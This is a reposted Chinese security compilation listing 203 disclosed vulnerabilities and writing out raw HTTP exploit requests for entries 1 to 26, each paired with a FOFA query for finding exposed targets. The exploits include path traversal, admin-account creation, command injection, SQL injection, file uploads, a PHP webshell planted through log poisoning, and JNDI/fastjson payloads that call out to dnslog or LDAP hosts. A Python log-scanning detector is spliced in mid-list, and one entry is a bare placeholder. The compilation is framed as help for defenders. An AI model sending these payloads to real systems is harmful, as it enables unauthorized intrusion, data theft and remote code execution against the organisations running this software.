Compilation of publicly disclosed internet vulnerabilities 202309-202406 (reposted)

Posted on 2024-6-5 14:31:29
Compilation of publicly disclosed internet vulnerabilities 202309-202406
道一安全 (Daoyi Security), 2024-06-05 07:41, Beijing
The following article is sourced from 网络安全新视界; author: 网络安全新视界

Purpose: Exploitation of Nday vulnerabilities makes up a large share of the attack methods seen in offensive-defensive engagements; we hope this article helps with defense. Defenders can use its content for risk triage.

Vulnerability sources: The article covers 203 high-impact vulnerability POCs disclosed domestically and abroad between September 2023 and May 2024, all collected from other public accounts or websites on the internet and compiled and published by the 网络安全新视界 team.

Security patches: All vulnerabilities are public; for patches or remediation, contact the product vendor.

Article content: Due to length constraints, a few overly long POCs are replaced with the word PAYLOAD; search for the full POC yourself if needed.

Legal rights: If the content infringes on any party's legitimate rights, contact the 网络安全新视界 team through the backend to have the relevant content removed.

Statement

To simplify things and make browsing easy, there is no "reply to get the full list". This article is the most complete version; when using it, press F12 and search for keywords.

Bookmark this article if you need it. You can also follow this public account (网络安全新视界).

Table of contents

1. StarRocks MPP database unauthorized access
2. Casdoor static arbitrary file read
3. EasyCVR intelligent edge gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user creation
5. NUUO NVR video storage management device remote command execution
6. Sangfor (深信服) NGAF arbitrary file read
7. 鸿运 active safety monitoring cloud platform arbitrary file download
8. Phicomm (斐讯) router RCE
9. DocCMS (稻壳CMS) keyword unauthenticated SQL injection
10. Landray (蓝凌) EIS smart collaboration platform api.aspx arbitrary file upload
11. Landray EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. Hongfan (红帆) iOffice ioFileDown arbitrary file read
14. Huaxia ERP (jshERP) sensitive information disclosure
15. Huaxia ERP getAllList information disclosure
16. Hongfan HFOffice (医微云) SQL injection
17. Dahua DSS itcBulletin SQL injection
18. Dahua DSS digital surveillance system user_edit.action information disclosure
19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. Dahua ICC intelligent IoT integrated management platform arbitrary file read
21. Dahua ICC intelligent IoT integrated management platform random remote code execution
22. Dahua ICC intelligent IoT integrated management platform log4j remote code execution
23. Dahua ICC intelligent IoT integrated management platform fastjson remote code execution
24. Yonyou (用友) NC 6.5 accept.jsp arbitrary file upload
25. Yonyou NC registerServlet JNDI remote code execution
26. Yonyou NC linkVoucher SQL injection
27. Yonyou NC showcontent SQL injection
28. Yonyou NC grouptemplet arbitrary file upload
29. Yonyou NC down/bill SQL injection
30. Yonyou NC importPml SQL injection
31. Yonyou NC runStateServlet SQL injection
32. Yonyou NC complainbilldetail SQL injection
33. Yonyou NC downTax/download SQL injection
34. Yonyou NC warningDetailInfo interface SQL injection
35. Yonyou NC-Cloud importhttpscer arbitrary file upload
36. Yonyou NC-Cloud soapFormat XXE
37. Yonyou NC-Cloud IUpdateService XXE
38. Yonyou U8 Cloud smartweb2.RPC.d XXE
39. Yonyou U8 Cloud RegisterServlet SQL injection
40. Yonyou U8-Cloud XChangeServlet XXE
41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
42. Yonyou GRP-U8 SmartUpload01 file upload
43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
45. Yonyou GRP-U8 ufgovbank XXE
46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
48. Yonyou U8 CRM swfupload arbitrary file upload
49. Yonyou U8 CRM uploadfile.php interface arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. 云时空 social commerce ERP system validateLoginName SQL injection
52. Weaver (泛微) E-Office json_common.php SQL injection
53. DPTech (迪普) VPN Service arbitrary file upload
54. Chanjet (畅捷通) T+ getstorewarehousebystore remote code execution
55. Chanjet T+ getdecallusers information disclosure
56. Chanjet T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
57. Chanjet T+ keyEdit.aspx SQL injection
58. Chanjet T+ KeyInfoList.aspx SQL injection
59. XETUX software dynamiccontent.properties.xhtml remote code execution
60. Byzoro (百卓) Smart management platform importexport.php SQL injection
61. 浙大恩特 customer resource management system fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. 捷诚 management information system CWSFinanceCommon SQL injection
65. 优卡特 脸爱云一脸通 smart management platform 1.0.55.0.0.1 privilege bypass
66. Wanhu (万户) ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
67. Wanhu ezOFFICE wpsservlet arbitrary file upload
68. Wanhu ezOFFICE wf_printnum.jsp SQL injection
69. Wanhu ezOFFICE contract_gd.jsp SQL injection
70. Wanhu ezEIP success command execution
71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
72. Seeyon (致远) OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. Seeyon M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. Newcapec (新开普) mobile campus service management platform service.action remote command execution
77. F22 garment management software system UploadHandler.ashx arbitrary file upload
78. pkpmbs construction project quality supervision system FileUpload.ashx file upload
79. BYTEVALUE (百为) flow control router remote command execution
80. 速达天耀 software DesignReportSave.jsp interface arbitrary file upload
81. Uniview (宇视) video surveillance main-cgi password leak
82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. Japanese tosei self-service laundry machine RCE
87. DBAppSecurity (安恒) 明御 security gateway aaa_local_web_preview file upload
88. DBAppSecurity 明御 security gateway aaa_portal_auth_config_reset remote command execution
89. Seeyon (致远互联) FE collaborative office platform editflow_manager SQL injection
90. Hikvision (海康威视) IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. Hikvision integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. Hikvision operations management center session command execution
93. Qi An Xin (奇安信) 网神 SecGate 3600 firewall app_av_import_save arbitrary file upload
94. Qi An Xin 网神 SecGate 3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast (盈可视) HD intelligent recording system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 settings cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated administrator creation
111. WordPress plugin HTML5 Video Player SQL injection
112. WordPress plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. Beijing Byzoro (北京百绰智能) S210 management platform uploadfile.php arbitrary file upload
119. Beijing Byzoro S20 backend sysmanageajax.php SQL injection
120. Beijing Byzoro S40 management platform import web.php arbitrary file upload
121. Beijing Byzoro S42 management platform userattestation.php arbitrary file upload
122. Beijing Byzoro s200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. 湖南建研 engineering quality inspection system arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. Aiohttp path traversal
127. Glodon (广联达) Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5 云商城 file.php file upload
134. Netentsec (网康) NS-ASG application security gateway index.php SQL injection
135. Netentsec NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat cors SSRF
137. Fujian Kirisun (福建科立讯) communication command and dispatch platform down_file.php SQL injection
138. Fujian Kirisun communication command and dispatch platform pwd_update.php SQL injection
139. Fujian Kirisun communication command and dispatch platform editemedia.php SQL injection
140. Fujian Kirisun communication command and dispatch platform get_extension_yl.php SQL injection
141. Fujian Kirisun communication command and dispatch management platform ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v.4.9.4 path traversal
148. CrushFTP authentication bypass template injection
149. AJ-Report open-source data dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. Gradio arbitrary file read
154. Tianwell (天维尔) fire rescue operations dispatch platform SQL injection
155. 六零导航页 file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. 美特 CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. Infinitt (英飞达) medical image archiving and communication system WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. Keytop (科拓) fully intelligent parking fee system Webservice.asmx arbitrary file upload
162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. 中成科信 ticketing management platform SeatMapHandler SQL injection
167. 精益价值 management system DownLoad.aspx arbitrary file read
168. Hongjing (宏景) EHR OutputCode arbitrary file read
169. Hongjing EHR downlawbase SQL injection
170. Hongjing EHR DisplayExcelCustomReport arbitrary file read
171. 通天星 CMSV6 vehicle positioning and monitoring platform SQL injection
172. DT HD license plate recognition camera arbitrary file read
173. Check Point security gateway arbitrary file read
174. Jinher (金和) OA C6 FileDownLoad.aspx arbitrary file read
175. Jinher OA C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom gateway configuration management system rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C campus network self-service system flexfileupload arbitrary file upload
179. 建文 engineering management system arbitrary file read
180. 帮管客 CRM jiliyu SQL injection
181. 润申科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
183. Guangzhou Tuchuang (广州图创) library cluster management system updOpuserPw SQL injection
184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
185. Realor (瑞友) 天翼 application virtualization system SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. 叁体-佳会 video conferencing attachment arbitrary file read
189. 蓝网科技 clinical viewing system deleteStudy SQL injection
190. Short-video matrix marketing system poihuoqu arbitrary file read
191. ESAFENET (亿赛通) electronic document security management system NavigationAjax SQL injection
192. 富通天下 foreign trade ERP UploadEmailAttr arbitrary file upload
193. Hillstone (山石网科) 云鉴 security management system setsystemtimeaction command execution
194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
195. 飞鱼星 internet behavior management system send_order.cgi command execution
196. 河南省风速科技 unified authentication platform password reset
197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
198. Aliyun Drive (阿里云盘) WebDAV command injection
199. Cockpit assetsmanager_upload interface file upload
200. SeaCMS (海洋影视管理系统) dmku SQL injection
201. Founder (方正) all-media news editing system binary SQL injection
202. WeEngine (微擎) AccountEdit arbitrary file upload
203. 红海云 EHR PtFjk file upload

POC list

1. StarRocks MPP database unauthorized access
FOFA: title="StarRocks"
GET /mem_tracker HTTP/1.1
Host: URL


2. Casdoor static arbitrary file read
FOFA: title="Casdoor"
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


3. EasyCVR intelligent edge gateway userlist information disclosure
FOFA: title="EasyCVR"
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx


4. EasyCVR video management platform arbitrary user creation
FOFA: title="EasyCVR"

Change password to the MD5 of your own password
POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1


5. NUUO NVR video storage management device remote command execution
FOFA: title="Network Video Recorder Login"
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx

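A defender-side check for the first five entries above, added here as an example and not part of the original compilation: it scans access-log lines in combined format for the request signatures of POCs 1-5, normalizing percent-encoding (up to two rounds, since later entries such as POC 9 double-encode) before matching. The log lines, rule names and log regex are constructed for this example.

```python
import re
from urllib.parse import unquote, urlsplit

# Combined log format (Apache/Nginx access log); the regex is written for this example.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)


def normalize_target(target, rounds=2):
    """Percent-decode up to `rounds` times and lower-case the result, so that
    %2e%2e, %252e%252e (double-encoded, as POC 9 does) and .. compare equal."""
    out = target
    for _ in range(rounds):
        decoded = unquote(out)
        if decoded == out:
            break
        out = decoded
    return out.lower()


# Request signatures taken from POCs 1-5 of this list. Each rule is
# (rule name, allowed methods or None for any, predicate over (path, query)).
RULES = [
    ("starrocks-mem_tracker", None,
     lambda path, query: path == "/mem_tracker"),
    ("casdoor-static-traversal", None,
     lambda path, query: path.startswith("/static/") and "../" in path),
    ("easycvr-userlist", None,
     lambda path, query: path == "/api/v1/userlist"),
    ("easycvr-adduser", {"POST"},
     lambda path, query: path == "/api/v1/adduser"),
    ("nuuo-debugging_center_utils", None,
     lambda path, query: path == "/__debugging_center_utils___.php" and "log=" in query),
]


def match_line(line):
    """Return the name of the first rule the log line matches, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(normalize_target(m.group("target")))
    for name, methods, predicate in RULES:
        if methods is not None and m.group("method") not in methods:
            continue
        if predicate(parts.path, parts.query):
            return name
    return None


def scan(lines):
    """Return [(1-based line number, rule name)] for every matching line."""
    hits = []
    for number, line in enumerate(lines, 1):
        name = match_line(line)
        if name is not None:
            hits.append((number, name))
    return hits


# Constructed sample log lines (not real traffic); line 3 uses percent-encoded dots
# and line 6 uses the wrong method, to exercise normalization and the method filter.
SAMPLE_LOG = """\
203.0.113.5 - - [05/Jun/2024:14:31:29 +0800] "GET /index.html HTTP/1.1" 200 512
203.0.113.7 - - [05/Jun/2024:14:32:01 +0800] "GET /mem_tracker HTTP/1.1" 200 8192
203.0.113.9 - - [05/Jun/2024:14:32:10 +0800] "GET /static/%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 200 1024
203.0.113.9 - - [05/Jun/2024:14:32:11 +0800] "GET /static/js/app.js HTTP/1.1" 200 4096
203.0.113.11 - - [05/Jun/2024:14:33:00 +0800] "POST /api/v1/adduser HTTP/1.1" 200 64
203.0.113.11 - - [05/Jun/2024:14:33:05 +0800] "GET /api/v1/adduser HTTP/1.1" 405 0
203.0.113.13 - - [05/Jun/2024:14:34:00 +0800] "GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1" 200 32
203.0.113.15 - - [05/Jun/2024:14:35:00 +0800] "GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1" 200 2048
""".splitlines()

if __name__ == "__main__":
    for number, name in scan(SAMPLE_LOG):
        print(f"line {number}: {name}")
```

Hits on the sample are lines 2, 3, 5, 7 and 8; the legitimate /static/js/app.js request and the GET to /api/v1/adduser do not match.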

6. Sangfor (深信服) NGAF arbitrary file read
FOFA: title="SANGFOR | NGAF"
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:


7. 鸿运 active safety monitoring cloud platform arbitrary file download
FOFA: body="./open/webApi.html"
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:


8. Phicomm (斐讯) router RCE
FOFA: icon_hash="-1344736688"
After logging into the backend with the default account admin, perform the following action
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=cookie obtained from the first-step login
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s:
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"


------WebKitFormBoundaryxbgjoytz--


9. DocCMS (稻壳CMS) keyword unauthenticated SQL injection
FOFA: app="Doccms"
GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1
Host: x.x.x.x

The payload is the double URL-encoding of the following statement

' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#


10. Landray (蓝凌) EIS smart collaboration platform api.aspx arbitrary file upload
FOFA: icon_hash="953405444"

After upload, the response contains the path of the uploaded file
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: x.x.x.x:xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 197
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu

------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"; filename="icfitnya.txt"
Content-Type: text/html

jmnqjfdsupxgfidopeixbgsxbf
------WebKitFormBoundaryxdgaqmqu--


11. Landray EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
FOFA: icon_hash="953405444" || app="Landray-EIS智慧协同平台"
G_PLACEHOLDER_REMOVED

12. Jorani < 1.0.2 remote command execution
FOFA: title="Jorani"
Step 1: obtain the cookie
GET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip

The csrf_cookie_jorani in the response is used in subsequent requests
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding

POST request: execute the function, with base64 encoding applied
POST /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
Accept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor

Send the following request to the target to execute the id command; the ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs= value in the request header is the base64-encoded command string
GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip


13. Hongfan (红帆) iOffice ioFileDown arbitrary file read
FOFA: app="红帆-ioffice"
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip


14. Huaxia ERP (jshERP) sensitive information disclosure
FOFA: body="jshERP-boot"
The leaked content includes usernames and passwords
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


15. Huaxia ERP getAllList information disclosure
CVE-2024-0490
FOFA: body="jshERP-boot"
The leaked content includes usernames and passwords
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
Host: 192.168.40.130:100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
Accept-Encoding: gzip


16. Hongfan HFOffice (医微云) SQL injection
FOFA: title="HFOffice"
The POC calls a function to compute the MD5 of 1234
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


17. Dahua DSS itcBulletin SQL injection
FOFA: app="dahua-DSS"
POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 345
Accept-Encoding: gzip

<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
<s11:Body>
    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
      <netMarkings>
       (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
      </netMarkings>
    </ns1:deleteBulletin>
  </s11:Body>
</s11:Envelope>


18. Dahua DSS digital surveillance system user_edit.action information disclosure
FOFA: app="dahua-DSS"
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
FOFA: app="dahua-DSS"
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


20. Dahua ICC intelligent IoT integrated management platform arbitrary file read
FOFA: body="*客户端会小于800*"
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


21. Dahua ICC intelligent IoT integrated management platform random remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 161
Accept-Encoding: gzip
Connection: close
Content-Type: application/json;charset=utf-8

{
"a":{
   "@type":"com.alibaba.fastjson.JSONObject",
    {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
  }""
}


22. Dahua ICC intelligent IoT integrated management platform log4j remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: application/json;charset=utf-8

{
"loginName":"${jndi:ldap://dnslog}"
}


23. Dahua ICC intelligent IoT integrated management platform fastjson remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json;charset=utf-8
Accept-Encoding: gzip
Connection: close

{
    "a":{
        "@type":"com.alibaba.fastjson.JSONObject",
       {"@type":"java.net.URL","val":"http://DNSLOG"}
        }""
}

24. Yonyou NC 6.5 accept.jsp arbitrary file upload
FOFA:icon_hash="1085941792"
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

25. Yonyou NC registerServlet JNDI remote code execution
FOFA:app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog

26. Yonyou NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
